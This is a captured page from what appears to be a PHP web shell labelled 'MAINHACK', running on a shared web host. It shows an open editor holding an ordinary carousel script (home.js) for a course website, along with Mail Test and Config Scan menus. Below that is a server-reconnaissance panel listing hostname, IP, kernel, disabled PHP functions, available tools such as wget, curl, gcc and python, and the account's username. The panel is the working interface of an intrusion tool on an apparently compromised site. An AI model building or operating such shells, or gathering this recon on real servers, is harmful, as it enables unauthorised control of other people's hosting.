[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: home.js
(function ($) { "use strict"; const defaultBreakpoints = { 991: { slidesPerView: 3, }, 660: { slidesPerView: 2, }, } const sliders = [ { container: 'features-swiper-container', pagination: "features-swiper-pagination", breakpoints: false }, { container: 'upcoming-courses-swiper', pagination: "upcoming-courses-swiper-pagination", breakpoints: defaultBreakpoints }, { container: 'latest-webinars-swiper', pagination: "latest-webinars-swiper-pagination", breakpoints: defaultBreakpoints }, { container: 'latest-bundle-swiper', pagination: "bundle-webinars-swiper-pagination", breakpoints: defaultBreakpoints }, { container: 'best-sales-webinars-swiper', pagination: "best-sales-webinars-swiper-pagination", breakpoints: defaultBreakpoints }, { container: 'best-rates-webinars-swiper', pagination: "best-rates-webinars-swiper-pagination", breakpoints: defaultBreakpoints }, { container: 'has-discount-webinars-swiper', pagination: "has-discount-webinars-swiper-pagination", breakpoints: defaultBreakpoints }, { container: 'free-webinars-swiper', pagination: "free-webinars-swiper-pagination", breakpoints: defaultBreakpoints }, { container: 'new-products-swiper', pagination: "new-products-swiper-pagination", breakpoints: { 1200: { slidesPerView: 4, }, 991: { slidesPerView: 3, }, 660: { slidesPerView: 2, }, } }, { container: 'testimonials-swiper', pagination: "testimonials-swiper-pagination", breakpoints: defaultBreakpoints }, { container: 'subscribes-swiper', pagination: "subscribes-swiper-pagination", breakpoints: defaultBreakpoints }, { container: 'organization-swiper-container', pagination: "organization-swiper-pagination", breakpoints: { 991: { slidesPerView: 4, }, 660: { slidesPerView: 2, }, } }, { container: 'trend-categories-swiper', pagination: "trend-categories-swiper-pagination", breakpoints: { 1200: { slidesPerView: 6, }, 991: { slidesPerView: 4, }, 660: { slidesPerView: 2, }, } }, ] for (const slider of sliders) { const swip = new Swiper('.' + slider.container, { slidesPerView: 1, spaceBetween: 16, loop: false, autoplay: { delay: 5000, disableOnInteraction: true, pauseOnMouseEnter: true, }, pagination: { el: '.' + slider.pagination, clickable: true, }, breakpoints: slider.breakpoints }); const $el = $("." + slider.container); $el.mouseenter(() => { swip.autoplay.stop(); }); $el.mouseleave(() => { swip.autoplay.start(); }); } $('.instructors-swiper-container').owlCarousel({ loop: true, center: true, items: 3, margin: 0, autoplay: true, dots: true, autoplayTimeout: 5000, smartSpeed: 450, responsive: { 0: { items: 1 }, 768: { items: 2 }, 1170: { items: 4 } } }); $(document).ready(function () { for (var i = 1; i <= 6; i++) { new Parallax(document.getElementById('parallax' + i), { relativeInput: true }); } }); })(jQuery);
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285